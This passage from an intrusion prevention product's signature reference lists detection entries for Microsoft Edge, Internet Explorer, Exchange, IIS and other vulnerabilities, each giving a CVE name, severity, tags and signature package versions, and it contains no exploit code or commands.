About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2018-04, CVE2018, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1057-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-0993
Description:
Back to top

File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-8133

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2018-05, CVE2018, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1065-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-8133
Description:
Back to top

File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-8179

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2018-05, CVE2018, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1065-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-8179
Description:
Back to top

File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-8583

About this situation: A vulnerability in Microsoft Edge
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2018, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1119-5242
Vulnerability: Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-8583
Description:
Back to top

File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-8618

About this situation: A vulnerability in Microsoft Edge
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2018, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1119-5242
Vulnerability: Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-8618
Description:
Back to top

File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-8624

About this situation: A vulnerability in Microsoft Edge
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2018, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1119-5242
Vulnerability: Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-8624
Description:
Back to top

File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-8629

About this situation: A vulnerability in Microsoft Edge
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2018, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1119-5242
Vulnerability: Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-8629
Description:
Back to top

File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2019-0590

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2019-02, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1132-5242
Last changed: sgpkg-ips-1132-5242
Vulnerability: Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2019-0590
Description:
Back to top

File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2019-0591

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2019-02, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1132-5242
Last changed: sgpkg-ips-1132-5242
Vulnerability: Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2019-0591
Description:
Back to top

File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2019-0593

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2019-02, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1132-5242
Last changed: sgpkg-ips-1132-5242
Vulnerability: Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2019-0593
Description:
Back to top

File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2019-0606

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2019-02, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1132-5242
Last changed: sgpkg-ips-1132-5242
Vulnerability: Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2019-0606
Description:
Back to top

File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2019-0607

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2019-02, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1132-5242
Last changed: sgpkg-ips-1132-5242
Vulnerability: Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2019-0607
Description:
Back to top

File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2019-0650

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2019-02, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1132-5242
Last changed: sgpkg-ips-1132-5242
Vulnerability: Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2019-0650
Description:
Back to top

File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2019-0651

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2019-02, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1132-5242
Last changed: sgpkg-ips-1132-5242
Vulnerability: Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2019-0651
Description:
Back to top

File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2019-0655

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2019-02, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1132-5242
Last changed: sgpkg-ips-1132-5242
Vulnerability: Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2019-0655
Description:
Back to top

File-Text_Microsoft-Edge-Typedarray.sort-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2016-12, CVE2016, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-859-5242
Last changed: sgpkg-ips-1858-5242
Vulnerability: Microsoft-Edge-Typedarray.sort-Use-After-Free
Description:
Back to top

File-Text_Microsoft-Edge-Use-After-Free-Vulnerability-CVE-2017-8605

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2017-07, CVE2017, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-944-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Edge-Use-After-Free-Vulnerability-CVE-2017-8605
Description:
Back to top

File-Text_Microsoft-Edge-Use-After-Free-Vulnerability-CVE-2018-0946

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2018-05, CVE2018, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1065-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Edge-Use-After-Free-Vulnerability-CVE-2018-0946
Description:
Back to top

File-Text_Microsoft-Edge-Use-After-Free-Vulnerability-CVE-2018-0954

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2018-05, CVE2018, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1065-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Edge-Use-After-Free-Vulnerability-CVE-2018-0954
Description:
Back to top

File-Text_Microsoft-Edge-Use-After-Free-Vulnerability-CVE-2018-8123

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2018-05, CVE2018, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1065-5242
Last changed: sgpkg-ips-1623-5242
Vulnerability: Microsoft-Edge-Use-After-Free-Vulnerability-CVE-2018-8123
Description:
Back to top

File-Text_Microsoft-Edge-Use-After-Free-Vulnerability-CVE-2019-0640

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2019-02, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1132-5242
Last changed: sgpkg-ips-1132-5242
Vulnerability: Microsoft-Edge-Use-After-Free-Vulnerability-CVE-2019-0640
Description:
Back to top

File-Text_Microsoft-Edge-Use-After-Free-Vulnerability-CVE-2019-0645

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2019-02, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1132-5242
Last changed: sgpkg-ips-1132-5242
Vulnerability: Microsoft-Edge-Use-After-Free-Vulnerability-CVE-2019-0645
Description:
Back to top

File-Text_Microsoft-Edge-XSS-CVE-2015-6170

About this situation: An attempt to exploit a vulnerability in Microsoft Edge Detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2015-12, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-711-5211
Last changed: sgpkg-ips-711-5211
Vulnerability: Microsoft-Edge-Code-Execution-CVE-2015-6170
Description:
Back to top

File-Text_Microsoft-Embedded-Font-EOT-File-Reference

About this situation: Reference to EOT file in embedded font definition
Context: Text File Stream
Severity: 2
Tags: Windows, x86, MS2006-01, CVE2006, Windows not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-684-5211
Vulnerability: Microsoft-Embedded-Web-Font-Buffer-Overflow
Description:
Back to top

File-Text_Microsoft-Excel-SLK-Payload-Delivery

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, Windows not specific, Microsoft Excel not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1156-5242
Last changed: sgpkg-ips-1156-5242
Vulnerability: Microsoft-Excel-SLK-Payload-Delivery
Description:
Back to top

File-Text_Microsoft-Exchange-Outlook-Web-Access-CSRF-CVE-2010-3213

About this situation: A malicious HTML document targeting CVE-2010-3213 detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Exchange Server, CVE2010, Windows not specific, Exchange Server not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Exchange-Outlook-Web-Access-CSRF-CVE-2010-3213
Description:
Back to top

File-Text_Microsoft-Exchange-Server-Outlook-Web-Access-Script-Injection

About this situation: Detects script code injection exploits against Microsoft Exchange Server
Context: Text File Stream
Severity: 7
Tags: Windows, x86, Exchange Server, MS2006-06, CVE2006, Windows not specific, Exchange Server not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-435-4219
Vulnerability: Microsoft-Exchange-Server-Outlook-Web-Access-Script-Injection
Description:
Back to top

File-Text_Microsoft-Forefront-Unified-Access-Gateway-Signurl.asp-XSS

About this situation: An attempt to exploit a vulnerability in Microsoft Forefront Unified Access Gateway detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Forefront Unified Access Gateway, MS2010-11, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-435-4219
Vulnerability: Microsoft-Forefront-Unified-Access-Gateway-Signurl.asp-XSS
Description:
Back to top

File-Text_Microsoft-Help-Centre-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft's Help Centre Protocol handler was detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2010-07, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-414-4219
Vulnerability: Microsoft-Help-Centre-Malformed-Escape-Sequence
Description:
Back to top

File-Text_Microsoft-Help-Centre-Malformed-Escape-Sequence

About this situation: An attempt to exploit a vulnerability in Microsoft's Help Centre Protocol handler was detected
Context: Text File Stream
Severity: 10
Tags: Windows, Any Hardware, MS2010-07, CVE2010, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Help-Centre-Malformed-Escape-Sequence
Description:
Back to top

File-Text_Microsoft-Help-Centre-Protocol-Access

About this situation: An attempt to use Microsoft's Centre Help Protocol handler was detected
Context: Text File Stream
Severity: 2
Tags: Windows, Any Hardware, MS2010-07, CVE2010, Windows not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-720-5211
Vulnerability: Microsoft-Help-Centre-Malformed-Escape-Sequence
Description:
Back to top

File-Text_Microsoft-HtmlDlgHelper-ActiveX-Component-Usage

About this situation: Reference to Microsoft HtmlDlgHelper ActiveX component detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, MS2010-10, CVE2010, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-410-4219
Vulnerability: Microsoft-Internet-Explorer-Uninitialized-Memory-Corruption-CVE-2010-3329
Description:
Back to top

File-Text_Microsoft-Ie-ActiveX-IObjectsafety-Implementation-Code-Execution

About this situation: Exploit against the tblinf32.dll ActiveX control in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2007-08, CVE2007, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-571-5211
Vulnerability: HTTP-Microsoft-Ie-ActiveX-Object-IObjectsafety-Implementation-Code-Execution
Description:
Back to top

File-Text_Microsoft-Ie-Body-Element-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer Body Element Use After Free detected.
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2011-10, CVE2011, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-687-5211
Last changed: sgpkg-ips-687-5211
Vulnerability: Microsoft-Internet-Explorer-Option-Element-Use-After-Free
Description:
Back to top

File-Text_Microsoft-Ie-CVE-2016-7198

About this situation: An attempt to trigger a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2016-11, CVE2016, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-819-5242
Last changed: sgpkg-ips-1202-5242
Vulnerability: Microsoft-Ie-CVE-2016-7198
Description:
Back to top

File-Text_Microsoft-Ie-ExecScript-File-Disclosure-Vulnerability

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer was detected.
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Internet Explorer 5.0, Internet Explorer 6.0, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-1403-5242
Vulnerability: Microsoft-Ie-ExecScript-File-Disclosure
Description:
Back to top

File-Text_Microsoft-Ie-Memory-Corruption-CVE-2010-0267

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, MS2010-03, CVE2010, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-722-5211
Vulnerability: Microsoft-Internet-Explorer-Uninitialized-Memory-Corruption-CVE-2010-0267
Description:
Back to top

File-Text_Microsoft-Ie-NMSA.ASFSourceMediaDescription-DoS-Vulnerability

About this situation: An attempt to exploit a Microsoft Ie NMSA.ASFSourceMediaDescription DoS vulnerability detected.
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, CVE2006, Windows not specific, Internet Explorer not specific, Suspected Denial of Service, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-676-5211
Last changed: sgpkg-ips-676-5211
Vulnerability: Microsoft-Ie-NMSA.ASFSourceMediaDescription-DoS-Vulnerability
Description:
Back to top

File-Text_Microsoft-Ie-RDS.DataControl.URL-DoS

About this situation: An attempt to exploit a Microsoft Ie RDS.DataControl.URL DoS Vulnerability detected.
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, CVE2006, Windows not specific, Internet Explorer not specific, Suspected Denial of Service, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-676-5211
Last changed: sgpkg-ips-676-5211
Vulnerability: Microsoft-Ie-RDS.DataControl.URL-DoS
Description:
Back to top

File-Text_Microsoft-Ie-Request-Header-Cross-Domain-Information-Disclosure

About this situation: Attempt to exploit an information disclosure vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2008-06, CVE2008, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-721-5211
Vulnerability: HTTP-Microsoft-Ie-Request-Header-Cross-Domain-Information-Disclosure
Description:
Back to top

File-Text_Microsoft-Ie-setHomePage-Function-Vulnerability

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer was detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, CVE2009, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Vulnerability: Microsoft-Ie-setHomePage-Function-Vulnerability
Description:
Back to top

File-Text_Microsoft-Ie-Use-After-Free-CVE-2016-7196

About this situation: An attempt to trigger a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 10.0, Internet Explorer 11.0, MS2016-11, CVE2016, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-819-5242
Last changed: sgpkg-ips-819-5242
Vulnerability: Microsoft-Ie-Use-After-Free-CVE-2016-7196
Description:
Back to top

File-Text_Microsoft-IIS-IDQ-IDA-HTX-Access

About this situation: Microsoft IIS path disclosure via IDQ, IDA or HTX file
Context: Text File Stream
Severity: 2
Tags: Windows, Any Hardware, IIS 5.0, IIS 4.0, CVE2000, Windows not specific, Potential Disclosure
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-485-5211
Vulnerability: HTTP-IIS-IDQ-IDA-HTX-Path-Disclosure
Description:
Back to top

File-Text_Microsoft-IIS-IDQ-IDA-HTX-Access-Unsuccess

About this situation: Microsoft IIS path disclosure via IDQ, IDA or HTX file
Context: Text File Stream
Severity: 2
Tags: Windows, Any Hardware, IIS 5.0, IIS 4.0, CVE2000, Windows not specific, Potential Disclosure
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: HTTP-IIS-IDQ-IDA-HTX-Path-Disclosure
Description:
Back to top

File-Text_Microsoft-Intenet-Explorer-Scripting-Engine-Memory-Corruption-CVE-2018-8643

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2018-12, CVE2018, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1332-5242
Vulnerability: Microsoft-Edge-Scripting-Engine-Memory-Corruption-CVE-2018-8643
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-7-WebDAV-Pathname-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows Vista, Windows 2008, Any Hardware, Internet Explorer 7.0, MS2008-12, CVE2008, Windows Vista not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-586-5211
Last changed: sgpkg-ips-586-5211
Vulnerability: Microsoft-Internet-Explorer-7-WebDAV-Pathname-Code-Execution
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-Address-Bar-Spoofing-Vulnerability

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Internet Explorer 5.0, Internet Explorer 6.0, CVE2004, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-863-5242
Vulnerability: Microsoft-Internet-Explorer-Address-Bar-Spoofing-Vulnerability
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-ALSR-Bypass-CVE-2015-2421

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2015-07, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-661-5211
Last changed: sgpkg-ips-1437-5242
Vulnerability: Microsoft-Internet-Explorer-ASLR-Bypass-CVE-2015-2421
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-And-Edge-Blocksite.htm-Spoofing

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 11.0, Microsoft Edge, MS2017-03, CVE2017, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-866-5242
Last changed: sgpkg-ips-866-5242
Vulnerability: Microsoft-Internet-Explorer-And-Edge-Blocksite.htm-Spoofing
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-And-Edge-Column-span-Type-Confusion

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Internet Explorer 10.0, Internet Explorer 11.0, Microsoft Edge, CVE2017, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-863-5242
Vulnerability: Microsoft-Internet-Explorer-And-Edge-Column-span-Type-Confusion
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-And-Edge-CVE-2015-6140-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 11.0, Microsoft Edge, MS2015-12, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1681-5242
Vulnerability: Microsoft-Internet-Explorer-And-Edge-CVE-2015-6140-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-And-Edge-CVE-2016-0061-Type-Confusion

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, Microsoft Edge, MS2016-02, CVE2016, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-863-5242
Vulnerability: Microsoft-Internet-Explorer-And-Edge-CVE-2016-0061-Type-Confusion
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-And-Edge-CVE-2016-0154-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, Microsoft Edge, MS2016-04, CVE2016, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-756-5211
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Internet-Explorer-And-Edge-CVE-2016-0154-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-And-Edge-CVE-2016-3247-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2016-09, CVE2016, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-803-5242
Last changed: sgpkg-ips-803-5242
Vulnerability: Microsoft-Internet-Explorer-And-Edge-CVE-2016-3247-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-And-Edge-CVE-2016-3351-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 11.0, Microsoft Edge, MS2016-09, CVE2016, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-803-5242
Last changed: sgpkg-ips-803-5242
Vulnerability: Microsoft-Internet-Explorer-And-Edge-CVE-2016-3351-Information-Disclosure
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-And-Edge-CVE-2016-7195-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, Microsoft Edge, MS2016-11, CVE2016, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-829-5242
Last changed: sgpkg-ips-829-5242
Vulnerability: Microsoft-Internet-Explorer-And-Edge-CVE-2016-7195-Information-Disclosure
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-And-Edge-CVE-2016-7202-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, Microsoft Edge, MS2016-12, CVE2016, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-838-5242
Last changed: sgpkg-ips-1858-5242
Vulnerability: Microsoft-Internet-Explorer-And-Edge-CVE-2016-7202-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-And-Edge-CVE-2016-7287-Type-Confusion

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 11.0, Microsoft Edge, MS2016-12, CVE2016, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-841-5242
Last changed: sgpkg-ips-1397-5242
Vulnerability: Microsoft-Internet-Explorer-And-Edge-CVE-2016-7287-Type-Confusion
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-And-Edge-Json.parse-Type-Confusion

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 11.0, Microsoft Edge, MS2016-11, CVE2016, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-836-5242
Last changed: sgpkg-ips-836-5242
Vulnerability: Microsoft-Internet-Explorer-And-Edge-Json.parse-Type-Confusion
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-And-Edge-Memory-Corruption-CVE-2016-3297

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
